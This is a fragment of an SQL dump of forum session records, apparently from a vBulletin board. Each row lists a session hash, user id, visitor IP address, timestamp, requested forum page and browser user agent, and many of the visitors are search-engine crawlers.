('173c87a9445e58756d80b55d9786dc0b', 0, '66.249.65.173', 'd94d9b57884c09af3425867acd2ac9ac', 1469311289, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('43df55cc9ea276b9317660162f99e53d', 0, '103.1.149.225', '889704b7b7a4266ab075254d990c71fd', 1469314033, '/showthread.php?t=2346', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0e3b62d560f8e5dd6ed7824700f59e71', 0, '104.129.24.138', '7b96c9cdc41bf969dfe529d486c8ca17', 1469315625, '/memberlist.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d25735d6871c0d7c6c1e0b9c814651ab', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469321001, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('96aafd0f410a1490070adcf559a5174f', 0, '41.66.28.72', 'aa4761cc0e17ded6cc2fbdd913b99130', 1469323924, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3cfc5c5d5ef1a7cc120f198451046688', 0, '36.45.167.182', '51ab2716d18fee860bfcc08b0692edc5', 1469324929, '/index.php', 'Mozilla/5.0 (Linux; U; Android 5.0.2; zh-CN; ALE-UL00 Build/HuaweiALE-UL00) AppleWebKit/534.30 (KHTM', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('81649fe755f6cdbba5927e0a67f7f3b7', 0, '66.249.93.93', '5ba335c807345de8e5ab5cff1572fff7', 1469339387, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('30ffa69b839463c2f43c3639df1234fa', 0, '82.221.139.25', '636b6c43c853f2dabb1deb63268a45ca', 1469340753, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f7e0158c9d450420f191e5580b178f1b', 0, '66.249.73.130', 'd8a3621051418f62d9ffdc31af6b58df', 1472971954, '/faq.php?faq=vb3_board_faq&langid=1', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 1, 0, 0, 0, 0, 2, 0, 0),
('5876825927dbe469ae3e93cd836765cb', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469364190, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('6558c3e6c9ebe23623a1e069d9fdd584', 0, '73.200.56.190', '67e136d7dee98752d6958992f530fedf', 1469364601, '/showthread.php?t=2346', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Ver', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('216d6e5be5fc1f22f496b600167c41c2', 0, '23.94.145.46', '2984fca65b9739f9f69fb2607ca7decd', 1474160729, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8dac663dfbacb26971fb0f1ef819ea39', 0, '94.197.120.175', 'fb63d416ec7124dc1f052598440957e2', 1469371770, '/showthread.php?p=3045', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mob', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c1aaa0dded7232a5c2a9754ad799602f', 0, '66.249.79.182', '42382f72607791905ff50694f07a1e96', 1470658563, '/archive/index.php/t-2461.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('e24761a29216b6d15d41b3a6d28fc8fa', 0, '66.249.79.179', '42382f72607791905ff50694f07a1e96', 1470659113, '/showthread.php?t=2386', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6d91052f7fac05966375c5bfdd02f34c', 0, '66.249.79.132', '42382f72607791905ff50694f07a1e96', 1470667465, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7d19b43900203aa511d50c281ea8ca6e', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469407202, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('e264ac91718232ea6b8c712fef79a9f4', 0, '41.189.161.38', 'b724600629b5c1eab8de6838e9e73439', 1469418488, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3b1f5331a1fe479065f74ebfb8b45e5c', 0, '212.252.141.125', '04f3e2f1bde1accb337433b683ab470d', 1469466180, '/index.php', 'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5937f278fe1ee3e2581b047bbb120f7e', 0, '103.206.107.4', 'cf825ccfbca0015a7b6f1e230b2055a5', 1469432538, '/showthread.php?t=2491', 'Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e228b48493596724ba3b30044efcd3c0', 0, '66.249.79.132', '1f427e4d6723ae757ae768f9466ee93a', 1470627670, '/archive/index.php/t-1854.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('0736fb9438fbc6d3cd08f0a119e1c19e', 0, '172.68.11.247', 'a5f6e56b565aff561f91bfad14a3b2fc', 1469442726, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a06c7843576822d2251a6916d847d00f', 0, '157.55.39.169', '23f3103f44bc3badcba53554e5e4cb6d', 1469457711, '/index.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b14c91c6e3e3d2e698454b896049a8af', 0, '207.46.13.191', '5e207e311e22cdc3b2095126a922fa93', 1469448198, '/archive/index.php/f-37.html', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('9770f35ab2e6c65aeff005a2ace6d18a', 0, '207.46.13.158', '5e207e311e22cdc3b2095126a922fa93', 1469448208, '/faq.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f712348a35197fde020667101e41260e', 0, '207.46.13.89', '5e207e311e22cdc3b2095126a922fa93', 1469448218, '/showthread.php?t=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('029508035e1bd941cb141b0652052dfb', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469450097, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('057d6d66188585cda29dff455946a173', 0, '31.131.24.112', '835af379e195d642e6f32c6a76e378de', 1469454708, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('86ebb8a0da661bc2e0a6ae7f49264535', 0, '185.65.134.81', '7e59f849677d0b3b3cc2f566d7a192f6', 1469456610, '/admincp/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e6e778683622501e33aba1d75ba1e849', 0, '66.249.93.93', 'f30e41c4891d4db6a7b69c83e5521344', 1469470891, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bc9eb0eaeea3ad1681c94320e670c249', 0, '174.70.24.194', '30e2f10242df03396d7685e56b442493', 1469476000, '/showthread.php?p=2688', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a2bc3ece31a92c33378a4fd2cd7666ef', 0, '195.211.23.218', '750d96c8b4e1e54687c1f91e7c498491', 1469491721, '/index.php', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('93528fae7983f6a9d735b1308eb1e437', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469493146, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('278866da883d076ba64fb452dc5f644e', 0, '201.171.161.84', 'c4068cd80c7e9276d81cf370d43afc39', 1469494125, '/faq.php', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b01386e83e7249df36810462979888c4', 0, '5.75.3.104', '0303976e6aa60bf2be569ee6b1ddb69b', 1469519634, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6655a70b6cb3018147cd913fe3eba30f', 161, '172.68.29.181', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1469519267, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('89e9fb294621ffd24de9d94146245437', 0, '172.68.34.60', 'a938925ca9403f145c82d10ebc1ecbe1', 1469527185, '/showthread.php?t=2234', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ca8f20288e9e13990852b32e608cc1c8', 0, '172.68.34.50', 'a938925ca9403f145c82d10ebc1ecbe1', 1470300739, '/member.php?u=133', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3012aa97ae95b32e457c0f98e6d50500', 0, '66.249.93.97', '7a4774d615cc7f00b8b037f7e353f526', 1469532836, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cc25319ebf5b565ee44198a761702f43', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469535928, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('2a6563d3850ca1429ecf6cc712d404b4', 0, '5.254.65.181', 'c4463986dcfaaf02a91113cf60813764', 1469543743, '/index.php?', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5a9b45fcce47d03f4d0d05cfdb34f17a', 0, '66.249.83.197', '7a4774d615cc7f00b8b037f7e353f526', 1469546147, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1619c35c463020a043a5bc889bca3b38', 0, '85.118.134.144', '7da31279b7c195b0141d8d86494afef9', 1474160216, '/index.php?langid=2', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('150e0b5935d5fd72a5427c205957595f', 0, '201.171.191.28', 'b3d18b052016802f7b3961d2329e322f', 1469576700, '/index.php', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0c869d7c761ba8c1a95a5ccf60ad4a4f', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469578784, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('b9281d84d8eb48f266b41b8968371d58', 0, '119.130.228.198', '9f5ea06122f9af497800cb7b11fcc8d2', 1469580206, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('aae116e282209c49aa4937a24dc537d9', 0, '172.68.34.51', '928eba6213ebea1532ebd9d74c021f1a', 1469581696, '/archive/index.php/f-37.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('34c96ce45d0019792a5aafd52b5d8886', 0, '172.68.34.49', '928eba6213ebea1532ebd9d74c021f1a', 1469581697, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1995f398a2fe894cd792317ca0a9118f', 0, '66.249.69.154', 'dce73380cf0fd3aff82da93d9252bb04', 1469609888, '/showthread.php?p=2882', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6005d41d0669e9525d7e65d4c5010cb0', 0, '95.85.10.218', '68cbbb6e88a50f3c0dc2c76e1cc76b2e', 1469615028, '/index.php', 'SafeDNSBot (https://www.safedns.com/searchbot)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ac6129a00533c526c4c3a0296371e3c0', 0, '172.68.34.91', '8c2a58ed4130be298d50116da95b8cf5', 1469616443, '/archive/index.php/t-2483.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('0cc2d05060fba6e1a7c65e40e8586e3f', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469621920, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('4b49de6d1c9e2108152dcf9bb8f9e6fb', 0, '212.252.142.167', '1e4f051036ded01e48eb972c6b704f9c', 1469630289, '/index.php', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2863ce3a14afd4e3b2938bd86974a3f2', 0, '176.10.104.243', 'b1a4d7a239b2a602f4f0c32e6163df65', 1469630563, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9e27e7d01f87b0ad4ba328a6a52000eb', 0, '157.55.39.79', '23f3103f44bc3badcba53554e5e4cb6d', 1469678881, '/archive/index.php/f-32.html', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('8e1af04ab088a097d32360170c09c3f9', 0, '157.55.39.160', '23f3103f44bc3badcba53554e5e4cb6d', 1469631095, '/showthread.php?t=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5ce3d51de1440842bf734a610746d319', 0, '40.77.167.24', 'c5490a5a8e1813ac25cf9e19091dcb85', 1469631107, '/archive/index.php/f-37.html', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('810d4f4f61d331763636e06f30351293', 0, '66.249.81.242', 'de7c94f3f0ed6e5340c08df337f533c7', 1469638266, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fb6a6b5320d38d187f271b3b20564f7d', 0, '66.249.64.157', '881de0811167d68e6f4733be9b8109c2', 1470717528, '/archive/index.php/f-36.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('36b7c2cc3cac92f96b9eddc288b18fbf', 0, '66.249.64.154', 'b74d0bcf4e50a120a01910c89bfe2d08', 1469644899, '/login.php?do=lostpw', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('471143088ea5fd41cde8ad5fc0eb6618', 0, '191.96.65.13', 'fd588d0d017729572e3628203c4e30c8', 1469647209, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e609ed24642d33af4410547915f8e9aa', 0, '213.7.246.235', 'd51759f5d1bc7c61ee237d8beee5e93e', 1469649146, '/index.php?', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a8500a6d8ed1ddfe417910ddb6553ba5', 0, '66.249.64.151', '881de0811167d68e6f4733be9b8109c2', 1470713823, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f6f0ec41968a48bfb44f052b9c51a59f', 0, '91.114.226.205', 'cda17566d5642fd7906f24f4fd0c1f4f', 1469658623, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ff3e1e39ea4f2947299c9c436cd3f52e', 0, '88.230.228.90', 'd31e1717b2d87b1ebf487059e3f52b1b', 1469660443, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.5.2704.63 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7471917809f5f089e0a6e18e4f2a6d8b', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469665156, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('e013f6ab0debf1e114054d14197deb43', 0, '27.34.115.17', 'b7511035135f7a54625bb05333d5dbac', 1469668309, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('19a7e60b7a9e8ec762a1f367117b105a', 0, '66.249.64.154', '881de0811167d68e6f4733be9b8109c2', 1470731047, '/tags.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b58450cf7a54efe68940003b329604bf', 0, '207.46.13.135', '5e207e311e22cdc3b2095126a922fa93', 1469678865, '/archive/index.php/f-36.html', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('bf968cd305d750518b743e101c424a4b', 0, '157.55.39.8', '23f3103f44bc3badcba53554e5e4cb6d', 1469678895, '/newreply.php?do=newreply&noquote=1&p=2933', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('792cd2731cd5779fdd17b3e7fd3a5164', 0, '66.249.64.145', '881de0811167d68e6f4733be9b8109c2', 1471037829, '/index.php?langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('696a348e6933a9644b5e44e4161f08a2', 0, '164.132.161.30', 'f069ebb6a315f0439dd2baf44ddfa550', 1469690957, '/index.php', 'Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c26a85f5cd67127aa0aa6b80418a717d', 0, '75.83.67.180', '9917691c51509229b170a07ea4abd1e3', 1469695488, '/index.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9493ce607c86c0cf3f02caa2ea77c37b', 0, '172.68.11.206', '1c112c7b74aa884c2b7de044005e8ccb', 1469697780, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a5ceebe024dc4248a56201e5c6720321', 0, '157.55.39.198', '23f3103f44bc3badcba53554e5e4cb6d', 1469701578, '/showthread.php?t=1835', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d719fa5fe28ef0c5cd476b6bf1e8aff4', 0, '66.249.64.148', '881de0811167d68e6f4733be9b8109c2', 1471035602, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c49fcfd08b3735a61b7fe153560c8e9b', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469707893, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('28c43fdd6376445c9cc9d06c26f49470', 0, '182.75.74.177', '19316df8622a5965fb6b098dbb00f9dc', 1469739604, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d8657570e8a7b3462c9bef81f81e02ac', 0, '52.192.117.225', 'cfbe104b96d240ef3d7966b52a91b3b2', 1469741551, '/memberlist.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.14', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b423e5c473e264e0d86babd8024b52b5', 0, '197.166.175.10', 'f62175fb7210e6c4b7011ffa25c34ac8', 1469748570, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('598808179983d1ed678117294f1a4fc9', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469750664, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('701fcfd019c6319243c07fc648db59b5', 161, '172.68.29.181', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1469786474, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('f2e944ed02930f889f8b44b794bf0848', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469793811, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('32e71d8b1f4a997313f0c3a763d5869e', 0, '88.150.188.10', 'ff9cc36757736fdad8a1350ae80e1eda', 1469794766, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('640aabd7ba30fcaec1bacec0516d3f40', 0, '88.150.188.10', 'ba753ef60e43a5a7c6d18a6fd2b466be', 1469794801, '/index.php/forumdisplay.php?f=25', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ff7cb2ce85221c6ec615b70f98b9517c', 0, '172.68.10.247', '3542dd33b0ddd748ea5662a1908df64d', 1469801313, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ab4df3090f614e09bee9383e4ae3ff2a', 173, '216.164.19.30', '451ef8a027c80e2040e08bad0b0da181', 1469805594, '/index.php', 'Mozilla/5.0 (compatible; Windows NT 6.4; SV3; WOW64; IA64, X11; en-US) AppleWebKit/9537.53+ Chrome/4', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('46921675856e51f006541de058e3bf23', 0, '193.90.12.87', '493fe6ab810d274b004bff1f12b58378', 1469806793, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3cfd852139728942f90189436b28df89', 0, '187.158.247.149', 'd2a03b8481f0b298c03e5315df9de618', 1469814987, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6ed29637621fa7ab3726ea09a47145e2', 0, '77.115.87.55', 'fc4c73b3772493877a38bd042c5b1db2', 1469816691, '/index.php', 'Mozilla/5.0 (Linux; Android 5.1.1; Redmi 3 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chro', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cd3fe0e1a240a25c35770a1c07fbf839', 0, '157.55.39.73', '23f3103f44bc3badcba53554e5e4cb6d', 1469826118, '/search.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7289736b1cfbffb4e02e896b5283801c', 0, '151.80.31.101', '6c646621f44b29794c63fd87c1286253', 1469834788, '/showthread.php?t=2480', 'Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
